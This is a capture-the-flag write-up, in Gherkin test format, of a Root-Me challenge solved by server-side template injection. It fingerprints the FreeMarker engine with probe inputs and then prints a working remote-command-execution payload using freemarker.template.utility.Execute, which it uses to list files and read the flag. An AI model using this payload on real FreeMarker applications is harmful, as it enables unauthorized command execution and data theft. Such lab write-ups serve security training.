## Version 2.0
## language: en

Feature: Web server-rootme
  Site:
    rootme
  Category:
    Web server
  User:
    juansorduz97
  Goal:
    Retrieve the validation password

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu          | 18.04.3     |
    | Mozilla         | 72.0.1      |
  Machine information:
    Given a link in the challenge page
    When I access it
    Then I can see the following message
    """
    Statement

    Exploit the vulnerability in order to retrieve the validation password in
    the file SECRET_FLAG.txt.
    """

  Scenario:  Success: execute OS commands
    Given The challenge page shows a message, a box, a button
    When I insert some random information
    Then The page shows the same information [evidence](normalusecase.png)
    When I check related sources in the challenge page
    """
    Server-Side Template Injection RCE For The Modern Web App - BlackHat 15
    """
    Then the document explains template injection methodology
    And It says that first you should detect, identify, exploit
    Given the challenge page says that It uses JAVA template
    When I insert random inputs to determine which template is used
    """
    | <input>                   | <output>          |
    | ${7+7}                    |  14               |
    | ${7*7}                    |  49               |
    | ${-1/7}                   |  -0.143           |
    | ${a+a}                    |                   |
    | ${'a'+'a'}                |  aa               |
    | ${'a'*'a'}                |  an error ocurrs  |
    | ${SECRET_FLAG.txt}        |                   |
    """
    Then I determine that "FreeMarker" is used after check the syntax on web
    When I check specific syntax of "FreeMarker"
    """
    | <input>                   | <output>          |
    | ${" hello"?cap_first}     |  Hello            |
    """
    Then I corroborated that challenge page is using "FreeMarker"
    When I check on web how to execute OS commands in "FreeMarker"
    Then I find the following syntax:
    """
    <#assign ex="freemarker.template.utility.Execute"?new()>
    ${ ex("[OScommand]") }
    """
    Given I know the syntax to execute OS command with "FreeMarker"
    When I introduce the following OS commands to read "SECRET_FLAG.txt"
    """
    | <input>                 | <output>                                     |
    | ${ ex("ls") }           |  pom.xml SECRET_FLAG.txt src target webapp   |
    | ${ ex("cat SECRET_FLAG.txt") }  |  [Challenge Flag]]                   |
    """
    Then I obtain the flag solving the challenge
